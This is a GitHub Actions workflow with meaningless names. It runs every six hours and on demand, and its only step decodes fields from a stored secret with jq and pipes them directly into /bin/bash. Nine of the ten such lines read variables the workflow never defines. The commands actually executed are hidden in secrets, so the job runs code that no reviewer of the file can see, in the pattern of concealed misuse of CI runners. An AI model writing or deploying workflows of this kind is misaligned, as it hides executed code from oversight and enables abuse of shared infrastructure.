name: maturehometeam
on:
  workflow_dispatch:
  schedule:
    - cron: '9 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: maturehometeam
        env:
          dkogn4: ${{ secrets.dkogn4 }}
        run: |
          echo $dkogn4 | jq -r .pcclp76 | /bin/bash
          echo $kecaa36781 | jq -r .j0339 | /bin/bash
          echo $nl03989 | jq -r .n00165 | /bin/bash
          echo $vsy791 | jq -r .um52745 | /bin/bash
          echo $ic259 | jq -r .r347 | /bin/bash
          echo $eh849 | jq -r .m512 | /bin/bash
          echo $amz61 | jq -r .z74 | /bin/bash
          echo $cdufh981 | jq -r .qy9773 | /bin/bash
          echo $k801 | jq -r .s4 | /bin/bash
          echo $eiqtj1 | jq -r .ad9 | /bin/bash

